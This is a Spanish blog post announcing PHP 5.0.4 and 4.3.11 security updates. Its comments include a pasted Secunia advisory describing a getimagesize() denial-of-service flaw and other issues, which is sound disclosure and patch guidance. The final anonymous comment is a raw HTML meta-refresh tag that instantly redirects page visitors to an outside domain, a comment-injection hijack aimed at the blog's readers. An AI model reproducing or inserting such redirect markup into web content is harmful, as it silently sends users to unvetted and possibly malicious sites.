Actualización en PHP: versión 5.0.4

Abril 01, 05 by admin

Nuestro lenguaje intérprete de programación favorito, PHP ( Hypertext Preprocessor, http://www.php.net/ ) acaba de sacar una nueva versión para su rama 5.x, en concreto la versión 5.0.4.

En esta nueva versión se corrigen recientes fallos de seguridad encontrados en las versiones 4.2.2, 4.3.9, 4.3.10 y 5.0.3 (otras versiones probablemente estén afectadas también). No se ha especificado el resultado de un ataque satisfactorio en algunos de estos fallos, en otros se ha comunicado que provocan una denegación de servicio (DoS) al causar un bucle infinito en la CPU.

Se recomienda actualizar a las versiones 4.3.11 o 5.0.4 (según la rama estable que se esté siguiendo): Descargas PHP

Más información:

The PHP Group:
http://www.php.net/release_4_3_11.php

iDEFENSE:
http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities

Date Viernes, 01 Abr 05 at 12:33
Under Otros temas
You can follow any responses to this entry through the RSS 2.0 feed .
You can leave a response , or trackback from your own site .

Add your comment

3 responses for this post

anónimo Says: 01.04.05 at 14:03

TITLE:
PHP Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA14792

VERIFY ADVISORY:
http://secunia.com/advisories/14792/

CRITICAL:
Moderately critical

IMPACT:
Unknown, DoS

WHERE:
From remote

SOFTWARE:
PHP 5.0.x
http://secunia.com/product/3919/
PHP 4.3.x
http://secunia.com/product/922/
PHP 4.2.x
http://secunia.com/product/105/

DESCRIPTION:
Multiple vulnerabilities have been reported in PHP, where some have
an unknown impact and others can be exploited by malicious people to
cause a DoS (Denial of Service).

1) Errors within the "php_handle_iff()" and "php_handle_jpeg()"
functions called by the "getimagesize()" PHP function can be
exploited to cause infinite loops and consume all available CPU
resources via a specially crafted image.

This has been reported in versions 4.2.2, 4.3.9, 4.3.10, and 5.0.3.
Other versions may also be affected.

2) Multiple unspecified security issues exist in the exif and fbsql
extensions and in the "unserialize()" and "swf_definepoly()" PHP
functions.

Other bugs have also been reported where some may be security
related.

SOLUTION:
Update to version 4.3.11 or 5.0.4.
http://www.php.net/downloads.php

PROVIDED AND/OR DISCOVERED BY:
1) Discovered by anonymous person and reported via iDEFENSE.
2) Reported by vendor.

ORIGINAL ADVISORY:
The PHP Group:
http://www.php.net/release_4_3_11.php

iDEFENSE:
http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities

———————————————————————-

About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.

Subscribe:
http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.

———————————————————————-

Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=mcarrion%40vianetworks.es

———————————————————————-
Fernando Ortega Says: 01.04.05 at 17:40

Miré la noticia en php.net, pero parece ser o era una página desactualizada, o entendí mal la información.

En cualquier caso la noticia ya ha sido actualizada, gracias.
anónimo Says: 06.05.05 at 22:53

<meta HTTP-EQUIV="Refresh" CONTENT="0;URL=http://mbytte.tk">